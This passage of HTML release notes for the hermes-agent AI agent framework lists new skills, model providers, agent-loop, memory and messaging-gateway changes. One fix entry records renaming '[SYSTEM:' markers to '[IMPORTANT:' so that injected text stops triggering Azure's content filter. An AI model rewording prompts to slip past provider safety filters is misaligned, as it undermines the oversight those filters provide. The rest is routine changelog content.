<li><strong>Clean shutdown</strong> — background review memory providers exit properly (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324771490" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15289/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15289">#15289</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16204/hovercard">#16204</a>)</li>
<li><strong>Clean context</strong> — prior-history tool messages excluded from review summary (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321369515" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/14967" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14967/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/14967">#14967</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15057" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15057/hovercard">#15057</a>)</li>
</ul>
<hr>
<h2>🧩 Skills Ecosystem</h2>
<h3>Skill integrations — newly bundled or promoted</h3>
<ul>
<li><strong>ComfyUI v5</strong> — official CLI + REST + hardware-gated local install; <strong>moved from optional to built-in</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17610" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17610/hovercard">#17610</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17631/hovercard">#17631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17734" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17734/hovercard">#17734</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17612" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17612/hovercard">#17612</a>)</li>
<li><strong>TouchDesigner-MCP</strong> — <strong>bundled by default</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16753" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16753/hovercard">#16753</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>), expanded with GLSL, post-FX, audio, geometry references (<a href="https://github.com/NousResearch/hermes-agent/pull/16624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16624/hovercard">#16624</a>), 9 new reference docs (<a href="https://github.com/NousResearch/hermes-agent/pull/16768" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16768/hovercard">#16768</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>)</li>
<li><strong>Humanizer</strong> — strips AI-isms from text (<a href="https://github.com/NousResearch/hermes-agent/pull/16787" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16787/hovercard">#16787</a>)</li>
<li><strong>claude-design</strong> — HTML artifact skill with disambiguation from other design skills (<a href="https://github.com/NousResearch/hermes-agent/pull/16358" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16358/hovercard">#16358</a>)</li>
<li><strong>design-md</strong> — Google's DESIGN.md spec skill (<a href="https://github.com/NousResearch/hermes-agent/pull/14876" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14876/hovercard">#14876</a>)</li>
<li><strong>airtable</strong> — salvaged skill + skill API keys wired into <code>.env</code> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329750175" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15838/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15838">#15838</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16291" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16291/hovercard">#16291</a>)</li>
<li><strong>pretext</strong> — creative browser demos with @chenglou/pretext (<a href="https://github.com/NousResearch/hermes-agent/pull/17259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17259/hovercard">#17259</a>)</li>
<li><strong>spike</strong> + <strong>sketch</strong> — throwaway experiments + HTML mockups, adapted from gsd-build (<a href="https://github.com/NousResearch/hermes-agent/pull/17421" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17421/hovercard">#17421</a>)</li>
</ul>
<h3>Skills UX</h3>
<ul>
<li><strong>Install skills from a direct HTTP(S) URL</strong> — <code>hermes skills install &lt;url&gt;</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/16323" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16323/hovercard">#16323</a>)</li>
<li><strong><code>/reload-skills</code></strong> slash command (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354439298" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17670" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17670/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17670">#17670</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17744" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17744/hovercard">#17744</a>)</li>
<li><strong><code>hermes skills list</code></strong> shows enabled/disabled status (<a href="https://github.com/NousResearch/hermes-agent/pull/16129" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16129/hovercard">#16129</a>)</li>
<li><strong><code>skill_manage</code> refuses writes on pinned skills</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17562" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17562/hovercard">#17562</a>)</li>
<li><strong><code>skill_manage</code> edits external_dirs skills in place</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265603041" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/9966" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/9966/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/9966">#9966</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17512/hovercard">#17512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17289/hovercard">#17289</a>)</li>
<li>Fix: inline-shell rendering in <code>skill_view</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/15376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15376/hovercard">#15376</a>)</li>
<li>Fix: exclude <code>.archive/</code> from skill index walk (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353889340" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17639/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17639">#17639</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17931" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17931/hovercard">#17931</a>)</li>
<li>Fix: dedicated docs page per bundled + optional skill (<a href="https://github.com/NousResearch/hermes-agent/pull/14929" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14929/hovercard">#14929</a>)</li>
<li>Fix: <code>google-workspace</code> shared HERMES_HOME helper + ship deps as optional extra (<a href="https://github.com/NousResearch/hermes-agent/pull/15405" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15405/hovercard">#15405</a>)</li>
<li>Fix: auto-wrap ASCII-art code blocks in generated skill pages (<a href="https://github.com/NousResearch/hermes-agent/pull/16497" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16497/hovercard">#16497</a>)</li>
<li>Point agent at <code>hermes-agent</code> skill + docs site for Hermes questions (<a href="https://github.com/NousResearch/hermes-agent/pull/16535" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16535/hovercard">#16535</a>)</li>
</ul>
<hr>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Provider &amp; Model Support</h3>
<h4>New providers</h4>
<ul>
<li><strong>GMI Cloud</strong> — first-class API-key provider on par with Arcee/Kilocode/Xiaomi (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286662004" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/11955" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/11955/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/11955">#11955</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isaachuangGMICLOUD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isaachuangGMICLOUD">@isaachuangGMICLOUD</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16663" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16663/hovercard">#16663</a>)</li>
<li><strong>Azure AI Foundry</strong> — auto-detection, full wiring (<a href="https://github.com/NousResearch/hermes-agent/pull/15845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15845/hovercard">#15845</a>)</li>
<li><strong>LM Studio</strong> — upgraded from custom-endpoint alias to first-class provider: dedicated auth, doctor checks, reasoning transport, live <code>/models</code> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344160673" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17061" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17061/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17061">#17061</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17102/hovercard">#17102</a>)</li>
<li><strong>MiniMax OAuth</strong> — PKCE browser flow with full OAuth integration (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323780002" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15203/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15203">#15203</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17524" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17524/hovercard">#17524</a>)</li>
<li><strong>Tencent Tokenhub</strong> — new provider (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341143946" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16860" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16860/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16860">#16860</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16960" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16960/hovercard">#16960</a>)</li>
</ul>
<h4>Model catalog</h4>
<ul>
<li><strong>Remote model catalog manifest</strong> — OpenRouter + Nous Portal catalogs pulled from remote manifest so new models show up without a release (<a href="https://github.com/NousResearch/hermes-agent/pull/16033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16033/hovercard">#16033</a>)</li>
<li><code>openai/gpt-5.5</code> and <code>gpt-5.5-pro</code> added to OpenRouter + Nous Portal (<a href="https://github.com/NousResearch/hermes-agent/pull/15343" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15343/hovercard">#15343</a>)</li>
<li><code>deepseek-v4-pro</code> and <code>deepseek-v4-flash</code> added (<a href="https://github.com/NousResearch/hermes-agent/pull/14934" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14934/hovercard">#14934</a>)</li>
<li><code>qwen3.6-plus</code> added to Alibaba-supported models (<a href="https://github.com/NousResearch/hermes-agent/pull/16896" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16896/hovercard">#16896</a>)</li>
<li>Gemini free-tier keys blocked at setup with 429 guidance surfacing (<a href="https://github.com/NousResearch/hermes-agent/pull/15100" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15100/hovercard">#15100</a>)</li>
</ul>
<h4>Model configuration</h4>
<ul>
<li><strong>Configurable <code>prompt_caching.cache_ttl</code></strong> — 5m default, 1h opt-in (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291700892" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/12659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/12659/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/12659">#12659</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15065" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15065/hovercard">#15065</a>)</li>
<li><code>/fast</code> whitelist broadened to all OpenAI + Anthropic models (<a href="https://github.com/NousResearch/hermes-agent/pull/16883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16883/hovercard">#16883</a>)</li>
<li><code>auxiliary.extra_body.reasoning</code> translates into Codex Responses API (<a href="https://github.com/NousResearch/hermes-agent/pull/17004" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17004/hovercard">#17004</a>)</li>
<li><code>hermes fallback</code> command for managing fallback providers (<a href="https://github.com/NousResearch/hermes-agent/pull/16052" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16052/hovercard">#16052</a>)</li>
</ul>
<h3>Agent Loop &amp; Conversation</h3>
<ul>
<li><strong>Native multimodal image routing</strong> — based on model vision capability, not provider defaults (<a href="https://github.com/NousResearch/hermes-agent/pull/16506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16506/hovercard">#16506</a>)</li>
<li><strong>Delegate <code>child_timeout_seconds</code> default bumped to 600s</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/14809" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14809/hovercard">#14809</a>)</li>
<li><strong>Diagnostic dump when subagent times out with 0 API calls</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15105" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15105/hovercard">#15105</a>)</li>
<li><strong>Gateway busts cached agent on compression/context_length config edits</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17008" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17008/hovercard">#17008</a>)</li>
<li><strong>Opt-in runtime-metadata footer on final replies</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17026" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17026/hovercard">#17026</a>)</li>
<li><code>/reload-mcp</code> awareness — rebuild cached agents + prompt-cache cost confirmation (<a href="https://github.com/NousResearch/hermes-agent/pull/17729" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17729/hovercard">#17729</a>)</li>
<li>Fix: repair CamelCase + <code>_tool</code> suffix tool-call emissions (<a href="https://github.com/NousResearch/hermes-agent/pull/15124" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15124/hovercard">#15124</a>)</li>
<li>Fix: retry on <code>json.JSONDecodeError</code> instead of treating as local validation error (<a href="https://github.com/NousResearch/hermes-agent/pull/15107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15107/hovercard">#15107</a>)</li>
<li>Fix: handle unescaped control chars in <code>tool_call.arguments</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/15356" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15356/hovercard">#15356</a>)</li>
<li>Fix: ordering fix in <code>_copy_reasoning_content_for_api</code> — cross-provider reasoning isolation (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zjianru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zjianru">@Zjianru</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15749" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15749/hovercard">#15749</a>)</li>
<li>Fix: inject empty <code>reasoning_content</code> for DeepSeek/Kimi <code>tool_calls</code> unconditionally (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zjianru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zjianru">@Zjianru</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15762" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15762/hovercard">#15762</a>)</li>
<li>Fix: persist streamed <code>reasoning_content</code> on assistant turns (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340873157" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16844" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/16844/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/16844">#16844</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16892" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16892/hovercard">#16892</a>)</li>
<li>Fix: cancel coroutine on timeout so worker thread exits; full traceback on tool failure (<a href="https://github.com/NousResearch/hermes-agent/pull/17428" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17428/hovercard">#17428</a>)</li>
<li>Fix: isolate <code>get_tool_definitions</code> quiet_mode cache + dedup LCM injection (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348759429" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17335" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/17335/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/17335">#17335</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17889" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17889/hovercard">#17889</a>)</li>
<li>Fix: serialize concurrent <code>hermes_tools</code> RPC calls from <code>execute_code</code> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355471738" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17770" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/17770/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/17770">#17770</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17894" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17894/hovercard">#17894</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17902" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17902/hovercard">#17902</a>)</li>
<li>Fix: rename <code>[SYSTEM:</code> → <code>[IMPORTANT:</code> in all user-injected markers (dodges Azure content filter) (<a href="https://github.com/NousResearch/hermes-agent/pull/16114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16114/hovercard">#16114</a>)</li>
</ul>
<h3>Compression</h3>
<ul>
<li><strong>Retry summary on main model for unknown errors before giving up</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16774" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16774/hovercard">#16774</a>)</li>
<li><strong>Notify users when configured aux model fails even if main-model fallback recovers</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16775" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16775/hovercard">#16775</a>)</li>
<li><code>/compress</code> wrapped in <code>_busy_command</code> to block input during compression (<a href="https://github.com/NousResearch/hermes-agent/pull/15388" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15388/hovercard">#15388</a>)</li>
<li>Fix: reserve system + tools headroom when aux binds threshold (<a href="https://github.com/NousResearch/hermes-agent/pull/15631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15631/hovercard">#15631</a>)</li>
<li>Fix: use text-char sum for multimodal token estimation in <code>_find_tail_cut_by_tokens</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/16369" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16369/hovercard">#16369</a>)</li>
</ul>
<h3>Session, Memory &amp; State</h3>
<ul>
<li><strong>Trigram FTS5 index for CJK search, replace LIKE fallback</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16651" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16651/hovercard">#16651</a>)</li>
<li><strong>Index <code>tool_name</code> + <code>tool_calls</code> in FTS5, with repair + migration</strong> (salvages <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341230419" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16866/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16866">#16866</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16914" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16914/hovercard">#16914</a>)</li>
<li><strong>Checkpoints: auto-prune orphan and stale shadow repos at startup</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16303/hovercard">#16303</a>)</li>
<li><strong>Memory providers notified on mid-process session_id rotation</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233233054" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/6672" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/6672/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/6672">#6672</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17409" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17409/hovercard">#17409</a>)</li>
<li>Fix: quote underscored terms in FTS5 query sanitization (<a href="https://github.com/NousResearch/hermes-agent/pull/16915" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16915/hovercard">#16915</a>)</li>
<li>Fix: resolve viking_read 500/412 on file URIs + pseudo-summary URIs (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4219466696" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/5886" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/5886/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/5886">#5886</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17869" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17869/hovercard">#17869</a>)</li>
<li>Fix: skip external-provider sync on interrupted turns (<a href="https://github.com/NousResearch/hermes-agent/pull/15395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15395/hovercard">#15395</a>)</li>
<li>Fix: close embedded Hindsight async client cleanly (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317073027" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/14605" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14605/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/14605">#14605</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16209" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16209/hovercard">#16209</a>)</li>
<li>Fix: pass session transcript to <code>shutdown_memory_provider</code> on gateway + CLI (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323309155" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15165" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/15165/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/15165">#15165</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16571" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16571/hovercard">#16571</a>)</li>
<li>Fix: write-origin metadata seam (<a href="https://github.com/NousResearch/hermes-agent/pull/15346" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15346/hovercard">#15346</a>)</li>
<li>Fix: preserve symlinks during atomic file writes (<a href="https://github.com/NousResearch/hermes-agent/pull/16980" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16980/hovercard">#16980</a>)</li>
<li>Refactor: remove <code>flush_memories</code> entirely (<a href="https://github.com/NousResearch/hermes-agent/pull/15696" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15696/hovercard">#15696</a>)</li>
</ul>
<h3>Auxiliary models</h3>
<ul>
<li>Fix: surface auxiliary failures in UI (previously silent) (<a href="https://github.com/NousResearch/hermes-agent/pull/15324" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15324/hovercard">#15324</a>)</li>
<li>Fix: surface title-gen auxiliary failures instead of silently dropping (<a href="https://github.com/NousResearch/hermes-agent/pull/16371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16371/hovercard">#16371</a>)</li>
<li>Fix: generalize unsupported-parameter detector and harden <code>max_tokens</code> retry (<a href="https://github.com/NousResearch/hermes-agent/pull/15633" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15633/hovercard">#15633</a>)</li>
</ul>
<hr>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>New Platforms</h3>
<ul>
<li><strong>Microsoft Teams (19th platform)</strong> — as a plugin, + xdist collision guard (<a href="https://github.com/NousResearch/hermes-agent/pull/17828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17828/hovercard">#17828</a>)</li>
<li><strong>Yuanbao (Tencent 元宝, 18th platform)</strong> — native adapter with text + media delivery (<a href="https://github.com/NousResearch/hermes-agent/pull/16298" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16298/hovercard">#16298</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17424/hovercard">#17424</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16880" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16880/hovercard">#16880</a>)</li>
</ul>
<h3>Pluggable Gateway Platforms</h3>
<ul>
<li><strong>Drop-in messaging adapters</strong> — the gateway is now a plugin host for platforms (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354380493" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17664" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17664/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17664">#17664</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17751/hovercard">#17751</a>)</li>
</ul>
<h3>Telegram</h3>
<ul>
<li><strong>Chat allowlists for groups and forums</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15027" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15027/hovercard">#15027</a>)</li>
<li><strong>Send fresh finals for stale preview streams</strong> (port openclaw#72038) (<a href="https://github.com/NousResearch/hermes-agent/pull/16261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16261/hovercard">#16261</a>)</li>
<li><strong>Render markdown tables as row-group bullets + prompt hint</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16997" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16997/hovercard">#16997</a>)</li>
<li>Document fallback in centralized audio routing (<a href="https://github.com/NousResearch/hermes-agent/pull/17833" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17833/hovercard">#17833</a>)</li>
